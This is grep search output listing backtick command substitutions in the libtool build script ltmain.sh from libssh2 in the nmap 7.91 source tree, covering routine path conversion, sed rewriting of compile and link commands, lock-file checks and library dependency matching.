nmap-7.91+dfsg1/libssh2/ltmain.sh:2752:      CC_expanded=`func_echo_all $CC`
nmap-7.91+dfsg1/libssh2/ltmain.sh:2753:      CC_quoted_expanded=`func_echo_all $CC_quoted`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2754-      case $@ in
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2764-	    # Evaluate the configuration.
nmap-7.91+dfsg1/libssh2/ltmain.sh:2765:	    eval "`$SED -n -e '/^# ### BEGIN LIBTOOL TAG CONFIG: '$z'$/,/^# ### END LIBTOOL TAG CONFIG: '$z'$/p' < $progpath`"
nmap-7.91+dfsg1/libssh2/ltmain.sh-2766-	    CC_quoted=
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2770-	    done
nmap-7.91+dfsg1/libssh2/ltmain.sh:2771:	    CC_expanded=`func_echo_all $CC`
nmap-7.91+dfsg1/libssh2/ltmain.sh:2772:	    CC_quoted_expanded=`func_echo_all $CC_quoted`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2773-	    case "$@ " in
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2862-    # zero AND non-empty stdout, which explains the odd construction:
nmap-7.91+dfsg1/libssh2/ltmain.sh:2863:    func_convert_core_file_wine_to_w32_tmp=`winepath -w "$1" 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2864-    if test "$?" -eq 0 && test -n "$func_convert_core_file_wine_to_w32_tmp"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2930-  if test -n "$LT_CYGPATH" && test -f "$LT_CYGPATH"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:2931:    func_cygpath_result=`$LT_CYGPATH "$@" 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2932-    if test "$?" -ne 0; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3101-    # LT_CYGPATH in this case.
nmap-7.91+dfsg1/libssh2/ltmain.sh:3102:    func_to_host_file_result=`cygpath -m "$1"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-3103-  fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3258-    func_to_host_path_tmp1=$func_stripname_result
nmap-7.91+dfsg1/libssh2/ltmain.sh:3259:    func_to_host_path_result=`cygpath -m -p "$func_to_host_path_tmp1"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-3260-    func_convert_path_check : ";" \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3468-    *.[cCFSifmso] | \
nmap-7.91+dfsg1/libssh2/ltmain.sh:3469:    *.ada | *.adb | *.ads | *.asm | \
nmap-7.91+dfsg1/libssh2/ltmain.sh-3470-    *.c++ | *.cc | *.ii | *.class | *.cpp | *.cxx | \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3545-    if test no = "$compiler_c_o"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:3546:      output_obj=`$ECHO "$srcfile" | $SED 's%^.*/%%; s%\.[^.]*$%%'`.$objext
nmap-7.91+dfsg1/libssh2/ltmain.sh-3547-      lockfile=$output_obj.lock
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3564-*** ERROR, $lockfile exists and contains:
nmap-7.91+dfsg1/libssh2/ltmain.sh:3565:`cat $lockfile 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-3566-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3612-      if test warn = "$need_locks" &&
nmap-7.91+dfsg1/libssh2/ltmain.sh:3613:	 test "X`cat $lockfile 2>/dev/null`" != "X$srcfile"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh-3614-	$ECHO "\
nmap-7.91+dfsg1/libssh2/ltmain.sh-3615-*** ERROR, $lockfile contains:
nmap-7.91+dfsg1/libssh2/ltmain.sh:3616:`cat $lockfile 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-3617-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3661-      if test warn = "$need_locks" &&
nmap-7.91+dfsg1/libssh2/ltmain.sh:3662:	 test "X`cat $lockfile 2>/dev/null`" != "X$srcfile"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh-3663-	$ECHO "\
nmap-7.91+dfsg1/libssh2/ltmain.sh-3664-*** ERROR, $lockfile contains:
nmap-7.91+dfsg1/libssh2/ltmain.sh:3665:`cat $lockfile 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-3666-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-3987-      # Get the absolute pathname.
nmap-7.91+dfsg1/libssh2/ltmain.sh:3988:      absdir=`cd "$dir" && pwd`
nmap-7.91+dfsg1/libssh2/ltmain.sh-3989-      test -n "$absdir" && dir=$absdir
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4086-      if test -n "$lt_sysroot"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:4087:        sysroot_regex=`$ECHO "$lt_sysroot" | $SED "$sed_make_literal_regex"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4088-        sysroot_cmd="s/\([ ']\)$sysroot_regex/\1/g;"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4370-	  # Determine the prefix the user has applied to our future dir.
nmap-7.91+dfsg1/libssh2/ltmain.sh:4371:	  inst_prefix_dir=`$ECHO "$destdir" | $SED -e "s%$libdir\$%%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4372-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4383-	    # Stick the inst_prefix_dir data into the link command.
nmap-7.91+dfsg1/libssh2/ltmain.sh:4384:	    relink_command=`$ECHO "$relink_command" | $SED "s%@inst_prefix_dir@%-inst-prefix-dir $inst_prefix_dir%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4385-	  else
nmap-7.91+dfsg1/libssh2/ltmain.sh:4386:	    relink_command=`$ECHO "$relink_command" | $SED "s%@inst_prefix_dir@%%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4387-	  fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4550-	    fi
nmap-7.91+dfsg1/libssh2/ltmain.sh:4551:	    libfile=$libdir/`$ECHO "$lib" | $SED 's%^.*/%%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4552-	    if test -n "$libdir" && test ! -f "$libfile"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4569-	        # Replace the output file specification.
nmap-7.91+dfsg1/libssh2/ltmain.sh:4570:	        relink_command=`$ECHO "$relink_command" | $SED 's%@OUTPUT@%'"$outputname"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4571-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4588-	    # Install the binary that we compiled earlier.
nmap-7.91+dfsg1/libssh2/ltmain.sh:4589:	    file=`$ECHO "$file$stripped_ext" | $SED "s%\([^/]*\)$%$objdir/\1%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4590-	  fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4662-    my_pic_p=${3-false}
nmap-7.91+dfsg1/libssh2/ltmain.sh:4663:    my_prefix=`$ECHO "$my_originator" | $SED 's%[^a-zA-Z0-9]%_%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4664-    my_dlsyms=
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4720-	  # Add our own program objects to the symbol list.
nmap-7.91+dfsg1/libssh2/ltmain.sh:4721:	  progfiles=`$ECHO "$objs$old_deplibs" | $SP2NL | $SED "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4722-	  for progfile in $progfiles; do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4782-	          # Use subshell, to avoid clobbering current variable values
nmap-7.91+dfsg1/libssh2/ltmain.sh:4783:	          dlprefile_dlname=`source "$curr_lafile" && echo "$dlname"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4784-	          if test -n "$dlprefile_dlname"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4951-	  if test -f "$output_objdir/$my_outputname.def"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:4952:	    compile_command=`$ECHO "$compile_command" | $SED "s%@SYMFILE@%$output_objdir/$my_outputname.def $symfileobj%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:4953:	    finalize_command=`$ECHO "$finalize_command" | $SED "s%@SYMFILE@%$output_objdir/$my_outputname.def $symfileobj%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4954-	  else
nmap-7.91+dfsg1/libssh2/ltmain.sh:4955:	    compile_command=`$ECHO "$compile_command" | $SED "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:4956:	    finalize_command=`$ECHO "$finalize_command" | $SED "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4957-	  fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4959-	*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:4960:	  compile_command=`$ECHO "$compile_command" | $SED "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:4961:	  finalize_command=`$ECHO "$finalize_command" | $SED "s%@SYMFILE@%$symfileobj%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4962-	  ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4974-      # Nullify the symbol file.
nmap-7.91+dfsg1/libssh2/ltmain.sh:4975:      compile_command=`$ECHO "$compile_command" | $SED "s% @SYMFILE@%%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:4976:      finalize_command=`$ECHO "$finalize_command" | $SED "s% @SYMFILE@%%"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4977-    fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-4988-  func_to_tool_file "$1" func_convert_file_msys_to_w32
nmap-7.91+dfsg1/libssh2/ltmain.sh:4989:  func_cygming_gnu_implib_tmp=`$NM "$func_to_tool_file_result" | eval "$global_symbol_pipe" | $EGREP ' (_head_[A-Za-z0-9_]+_[ad]l*|[A-Za-z0-9_]+_[ad]l*_iname)$'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-4990-  test -n "$func_cygming_gnu_implib_tmp"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5001-  func_to_tool_file "$1" func_convert_file_msys_to_w32
nmap-7.91+dfsg1/libssh2/ltmain.sh:5002:  func_cygming_ms_implib_tmp=`$NM "$func_to_tool_file_result" | eval "$global_symbol_pipe" | $GREP '_NULL_IMPORT_DESCRIPTOR'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5003-  test -n "$func_cygming_ms_implib_tmp"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5017-  win32_libid_type=unknown
nmap-7.91+dfsg1/libssh2/ltmain.sh:5018:  win32_fileres=`file -L $1 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5019-  case $win32_fileres in
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5082-
nmap-7.91+dfsg1/libssh2/ltmain.sh:5083:  sharedlib_from_linklib_result=`$DLLTOOL --identify-strict --identify "$1"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5084-}
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5100-
nmap-7.91+dfsg1/libssh2/ltmain.sh:5101:  match_literal=`$ECHO "$1" | $SED "$sed_make_literal_regex"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5102-  $OBJDUMP -s --section "$1" "$2" 2>/dev/null |
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5164-    # binutils import library
nmap-7.91+dfsg1/libssh2/ltmain.sh:5165:    sharedlib_from_linklib_result=`func_cygming_dll_for_implib_fallback_core '.idata$7' "$1"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5166-  elif func_cygming_ms_implib_p "$1"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh-5167-    # ms-generated import library
nmap-7.91+dfsg1/libssh2/ltmain.sh:5168:    sharedlib_from_linklib_result=`func_cygming_dll_for_implib_fallback_core '.idata$6' "$1"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5169-  else
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5248-	  darwin_base_archive=$func_basename_result
nmap-7.91+dfsg1/libssh2/ltmain.sh:5249:	  darwin_arches=`$LIPO -info "$darwin_archive" 2>/dev/null | $GREP Architectures 2>/dev/null || true`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5250-	  if test -n "$darwin_arches"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:5251:	    darwin_arches=`$ECHO "$darwin_arches" | $SED -e 's/.*are://'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5252-	    darwin_arch=
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5262-            ## Okay now we've a bunch of thin objects, gotta fatten them up :)
nmap-7.91+dfsg1/libssh2/ltmain.sh:5263:	    darwin_filelist=`find unfat-$$ -type f -name \*.o -print -o -name \*.lo -print | $SED -e "$sed_basename" | sort -u`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5264-	    darwin_file=
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5266-	    for darwin_file in $darwin_filelist; do
nmap-7.91+dfsg1/libssh2/ltmain.sh:5267:	      darwin_files=`find unfat-$$ -name $darwin_file -print | sort | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5268-	      $LIPO -create -output "$darwin_file" $darwin_files
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5281-      esac
nmap-7.91+dfsg1/libssh2/ltmain.sh:5282:      my_oldobjs="$my_oldobjs "`find $my_xdir -name \*.$objext -print -o -name \*.lo -print | sort | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5283-    done
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5352-
nmap-7.91+dfsg1/libssh2/ltmain.sh:5353:    qECHO=`$ECHO "$ECHO" | $SED "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5354-    $ECHO "\
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5387-    --lt-dump-script)
nmap-7.91+dfsg1/libssh2/ltmain.sh:5388:        lt_dump_D=\`\$ECHO \"X\$lt_script_arg0\" | $SED -e 's/^X//' -e 's%/[^/]*$%%'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5389-        test \"X\$lt_dump_D\" = \"X\$lt_script_arg0\" && lt_dump_D=.
nmap-7.91+dfsg1/libssh2/ltmain.sh:5390:        lt_dump_F=\`\$ECHO \"X\$lt_script_arg0\" | $SED -e 's/^X//' -e 's%^.*/%%'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5391-        cat \"\$lt_dump_D/\$lt_dump_F\"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5414-    \$ECHO \"$outputname:$output:\$LINENO: newargv[\$lt_dump_args_N]: \$lt_arg\"
nmap-7.91+dfsg1/libssh2/ltmain.sh:5415:    lt_dump_args_N=\`expr \$lt_dump_args_N + 1\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5416-  done
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5472-  # Find the directory that this script lives in.
nmap-7.91+dfsg1/libssh2/ltmain.sh:5473:  thisdir=\`\$ECHO \"\$file\" | $SED 's%/[^/]*$%%'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5474-  test \"x\$thisdir\" = \"x\$file\" && thisdir=.
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5476-  # Follow symbolic links until we get to the real thisdir.
nmap-7.91+dfsg1/libssh2/ltmain.sh:5477:  file=\`ls -ld \"\$file\" | $SED -n 's/.*-> //p'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5478-  while test -n \"\$file\"; do
nmap-7.91+dfsg1/libssh2/ltmain.sh:5479:    destdir=\`\$ECHO \"\$file\" | $SED 's%/[^/]*\$%%'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5480-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5488-
nmap-7.91+dfsg1/libssh2/ltmain.sh:5489:    file=\`\$ECHO \"\$file\" | $SED 's%^.*/%%'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh:5490:    file=\`ls -ld \"\$thisdir/\$file\" | $SED -n 's/.*-> //p'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5491-  done
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5502-    case \"\$thisdir\" in
nmap-7.91+dfsg1/libssh2/ltmain.sh:5503:    *[\\\\/]$objdir ) thisdir=\`\$ECHO \"\$thisdir\" | $SED 's%[\\\\/][^\\\\/]*$%%'\` ;;
nmap-7.91+dfsg1/libssh2/ltmain.sh-5504-    $objdir )   thisdir=. ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5508-  # Try to get the absolute directory name.
nmap-7.91+dfsg1/libssh2/ltmain.sh:5509:  absdir=\`cd \"\$thisdir\" && pwd\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5510-  test -n \"\$absdir\" && thisdir=\"\$absdir\"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5518-  if test ! -f \"\$progdir/\$program\" ||
nmap-7.91+dfsg1/libssh2/ltmain.sh:5519:     { file=\`ls -1dt \"\$progdir/\$program\" \"\$progdir/../\$program\" 2>/dev/null | $SED 1q\`; \\
nmap-7.91+dfsg1/libssh2/ltmain.sh-5520-       test \"X\$file\" != \"X\$progdir/\$program\"; }; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5533-    if test -n \"\$relink_command\"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:5534:      if relink_command_output=\`eval \$relink_command 2>&1\`; then :
nmap-7.91+dfsg1/libssh2/ltmain.sh-5535-      else
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-5577-    # The second colon is a workaround for a bug in BeOS R4 sed
nmap-7.91+dfsg1/libssh2/ltmain.sh:5578:    $shlibpath_var=\`\$ECHO \"\$$shlibpath_var\" | $SED 's/::*\$//'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-5579-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-6556-
nmap-7.91+dfsg1/libssh2/ltmain.sh:6557:    case `eval $file_magic_cmd \"\$1\" 2>/dev/null | $SED -e 10q` in
nmap-7.91+dfsg1/libssh2/ltmain.sh-6558-    *import*) : ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-6804-	    moreargs=
nmap-7.91+dfsg1/libssh2/ltmain.sh:6805:	    for fil in `cat "$save_arg"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-6806-	    do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7065-	*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:7066:	  absdir=`cd "$dir" && pwd`
nmap-7.91+dfsg1/libssh2/ltmain.sh-7067-	  test -z "$absdir" && \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7086-	*-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:7087:	  testbindir=`$ECHO "$dir" | $SED 's*/lib$*/bin*'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-7088-	  case :$dllsearchpath: in
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7383-      -Z*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:7384:        if test os2 = "`expr $host : '.*\(os2\)'`"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh-7385-          # OS/2 uses -Zxxx to specify OS/2-specific options
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7553-      # get the directories listed in $shlibpath_var
nmap-7.91+dfsg1/libssh2/ltmain.sh:7554:      eval shlib_search_path=\`\$ECHO \"\$$shlibpath_var\" \| \$SED \'s/:/ /g\'\`
nmap-7.91+dfsg1/libssh2/ltmain.sh-7555-    else
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7872-		  set dummy $deplibs_check_method; shift
nmap-7.91+dfsg1/libssh2/ltmain.sh:7873:		  match_pattern_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-7874-		  if eval "\$ECHO \"$deplib\"" 2>/dev/null | $SED 10q \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7962-	if test -n "$inherited_linker_flags"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:7963:	  tmp_inherited_linker_flags=`$ECHO "$inherited_linker_flags" | $SED 's/-framework \([^ $]*\)/\1.ltframework/g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-7964-	  for tmp_inherited_linker_flag in $tmp_inherited_linker_flags; do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-7970-	fi
nmap-7.91+dfsg1/libssh2/ltmain.sh:7971:	dependency_libs=`$ECHO " $dependency_libs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-7972-	if test lib,link = "$linkmode,$pass" ||
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8043-	*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:8044:	  abs_ladir=`cd "$ladir" && pwd`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8045-	  if test -z "$abs_ladir"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8296-	    shift
nmap-7.91+dfsg1/libssh2/ltmain.sh:8297:	    libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8298-	    # use dlname if we got it. it's perfectly good, no?
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8588-		*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:8589:		  absdir=`cd "$dir" && pwd`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8590-		  if test -z "$absdir"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8599-		  depdepl=
nmap-7.91+dfsg1/libssh2/ltmain.sh:8600:		  eval deplibrary_names=`$SED -n -e 's/^library_names=\(.*\)$/\1/p' $deplib`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8601-		  if test -n "$deplibrary_names"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8606-		      depdepl=$absdir/$objdir/$depdepl
nmap-7.91+dfsg1/libssh2/ltmain.sh:8607:		      darwin_install_name=`$OTOOL -L $depdepl | awk '{if (NR == 2) {print $1;exit}}'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8608-                      if test -z "$darwin_install_name"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:8609:                          darwin_install_name=`$OTOOL64 -L $depdepl  | awk '{if (NR == 2) {print $1;exit}}'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8610-                      fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8621-		else
nmap-7.91+dfsg1/libssh2/ltmain.sh:8622:		  eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $deplib`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8623-		  test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8644-	else
nmap-7.91+dfsg1/libssh2/ltmain.sh:8645:	  compiler_flags="$compiler_flags "`$ECHO " $new_inherited_linker_flags" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-8646-	fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-8733-        linux*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:8734:          case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/ltmain.sh-8735-          *Sun\ C*) # Sun C++ 5.9
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9141-	removelist=
nmap-7.91+dfsg1/libssh2/ltmain.sh:9142:	tempremovelist=`$ECHO "$output_objdir/*"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9143-	for p in $tempremovelist; do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9167-	# Transform .lo files to .o files.
nmap-7.91+dfsg1/libssh2/ltmain.sh:9168:	oldobjs="$objs "`$ECHO "$libobjs" | $SP2NL | $SED "/\.$libext$/d; $lo2o" | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9169-      fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9172-      #for path in $notinst_path; do
nmap-7.91+dfsg1/libssh2/ltmain.sh:9173:      #	lib_search_path=`$ECHO "$lib_search_path " | $SED "s% $path % %g"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:9174:      #	deplibs=`$ECHO "$deplibs " | $SED "s% -L$path % %g"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:9175:      #	dependency_libs=`$ECHO "$dependency_libs " | $SED "s% -L$path % %g"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9176-      #done
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9293-		if test -n "$i"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:9294:		  libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh:9295:		  deplib_matches=`eval "\\$ECHO \"$library_names_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9296-		  set dummy $deplib_matches; shift
nmap-7.91+dfsg1/libssh2/ltmain.sh-9297-		  deplib_match=$1
nmap-7.91+dfsg1/libssh2/ltmain.sh:9298:		  if test `expr "$ldd_output" : ".*$deplib_match"` -ne 0; then
nmap-7.91+dfsg1/libssh2/ltmain.sh-9299-		    func_append newdeplibs " $i"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9336-		  if test -n "$i"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:9337:		    libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh:9338:		    deplib_matches=`eval "\\$ECHO \"$library_names_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9339-		    set dummy $deplib_matches; shift
nmap-7.91+dfsg1/libssh2/ltmain.sh-9340-		    deplib_match=$1
nmap-7.91+dfsg1/libssh2/ltmain.sh:9341:		    if test `expr "$ldd_output" : ".*$deplib_match"` -ne 0; then
nmap-7.91+dfsg1/libssh2/ltmain.sh-9342-		      func_append newdeplibs " $i"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9371-	  set dummy $deplibs_check_method; shift
nmap-7.91+dfsg1/libssh2/ltmain.sh:9372:	  file_magic_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9373-	  for a_deplib in $deplibs; do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9386-	      if test -n "$a_deplib"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:9387:		libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9388-		if test -n "$file_magic_glob"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:9389:		  libnameglob=`func_echo_all "$libname" | $SED -e $file_magic_glob`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9390-		else
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9396-		    shopt -s nocaseglob
nmap-7.91+dfsg1/libssh2/ltmain.sh:9397:		    potential_libs=`ls $i/$libnameglob[.-]* 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9398-		    $nocaseglob
nmap-7.91+dfsg1/libssh2/ltmain.sh-9399-		  else
nmap-7.91+dfsg1/libssh2/ltmain.sh:9400:		    potential_libs=`ls $i/$libnameglob[.-]* 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9401-		  fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9414-		      while test -h "$potlib" 2>/dev/null; do
nmap-7.91+dfsg1/libssh2/ltmain.sh:9415:			potliblink=`ls -ld $potlib | $SED 's/.* -> //'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9416-			case $potliblink in
nmap-7.91+dfsg1/libssh2/ltmain.sh-9417-			[\\/]* | [A-Za-z]:[\\/]*) potlib=$potliblink;;
nmap-7.91+dfsg1/libssh2/ltmain.sh:9418:			*) potlib=`$ECHO "$potlib" | $SED 's|[^/]*$||'`"$potliblink";;
nmap-7.91+dfsg1/libssh2/ltmain.sh-9419-			esac
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9455-	  set dummy $deplibs_check_method; shift
nmap-7.91+dfsg1/libssh2/ltmain.sh:9456:	  match_pattern_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9457-	  for a_deplib in $deplibs; do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9470-	      if test -n "$a_deplib"; then
nmap-7.91+dfsg1/libssh2/ltmain.sh:9471:		libname=`eval "\\$ECHO \"$libname_spec\""`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9472-		for i in $lib_search_path $sys_lib_search_path $shlib_search_path; do
nmap-7.91+dfsg1/libssh2/ltmain.sh:9473:		  potential_libs=`ls $i/$libname[.-]* 2>/dev/null`
